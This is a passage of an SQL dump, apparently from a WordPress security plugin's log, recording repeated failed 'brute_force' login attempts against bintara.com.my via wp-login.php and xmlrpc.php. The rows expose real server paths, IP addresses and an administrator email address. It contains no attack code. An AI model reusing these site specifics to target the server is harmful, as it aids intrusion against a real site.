_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.209.144.199\";s:11:\"REMOTE_PORT\";s:5:\"51738\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWw4iVvRyrCg9V6axS2q8gAAAU8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567373449.1456\";s:12:\"REQUEST_TIME\";s:10:\"1567373449\";}}','notice','2019-09-01 21:30:50','2019-09-01 21:30:49',17688976,19179312,'https://bintara.com.my/wp-login.php',1,0,'103.209.144.199'),(23500,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.209.144.199\";s:11:\"REMOTE_PORT\";s:5:\"52416\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWw4i1vRyrCg9V6axS2q8wAAAUA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567373451.9788\";s:12:\"REQUEST_TIME\";s:10:\"1567373451\";}}','notice','2019-09-01 21:30:54','2019-09-01 21:30:52',18203032,19501024,'https://bintara.com.my/xmlrpc.php',1,0,'103.209.144.199'),(23501,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"198.245.49.191\";s:11:\"REMOTE_PORT\";s:5:\"53916\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWw-St9YzdT54U4Mrp8U9wAAAYY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567375178.9482\";s:12:\"REQUEST_TIME\";s:10:\"1567375178\";}}','notice','2019-09-01 21:59:40','2019-09-01 21:59:39',17692112,19177632,'https://bintara.com.my/wp-login.php',1,0,'198.245.49.191'),(23572,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"196.41.122.39\";s:11:\"REMOTE_PORT\";s:5:\"48900\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWz4h7KqO4n7fHB27AQs4gAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567422600.1864\";s:12:\"REQUEST_TIME\";s:10:\"1567422600\";}}','notice','2019-09-02 11:10:03','2019-09-02 11:10:00',17685280,19177456,'https://bintara.com.my/wp-login.php',1,0,'196.41.122.39'),(23573,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"196.41.122.39\";s:11:\"REMOTE_PORT\";s:5:\"49706\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWz4jrKqO4n7fHB27AQs5QAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567422607.1866\";s:12:\"REQUEST_TIME\";s:10:\"1567422607\";}}','notice','2019-09-02 11:10:08','2019-09-02 11:10:07',18203784,19500456,'https://bintara.com.my/xmlrpc.php',1,0,'196.41.122.39'),(23574,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.79.30\";s:11:\"REMOTE_PORT\";s:5:\"47644\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWz8fbKqO4n7fHB27AQvfwAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567423620.5039\";s:12:\"REQUEST_TIME\";s:10:\"1567423620\";}}','notice','2019-09-02 11:27:01','2019-09-02 11:27:00',17687000,19178032,'https://bintara.com.my/wp-login.php',1,0,'37.187.79.30'),(23575,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.79.30\";s:11:\"REMOTE_PORT\";s:5:\"49008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWz8hzU4VuPOeWsfkg1Q-wAAAQM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567423628.1151\";s:12:\"REQUEST_TIME\";s:10:\"1567423628\";}}','notice','2019-09-02 11:27:09','2019-09-02 11:27:08',18205216,19502536,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.79.30'),(23576,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.158.182\";s:11:\"REMOTE_PORT\";s:5:\"49795\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0AycHMNng1AySUGybJLQAAAMI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567424713.5382\";s:12:\"REQUEST_TIME\";s:10:\"1567424713\";}}','notice','2019-09-02 11:45:15','2019-09-02 11:45:13',17689416,19182056,'https://bintara.com.my/wp-login.php',1,0,'128.199.158.182'),(23577,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.158.182\";s:11:\"REMOTE_PORT\";s:5:\"50135\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0AyzU4VuPOeWsfkg1RiAAAAQ4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567424715.8484\";s:12:\"REQUEST_TIME\";s:10:\"1567424715\";}}','notice','2019-09-02 11:45:17','2019-09-02 11:45:16',18202776,19502008,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.158.182'),(23578,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 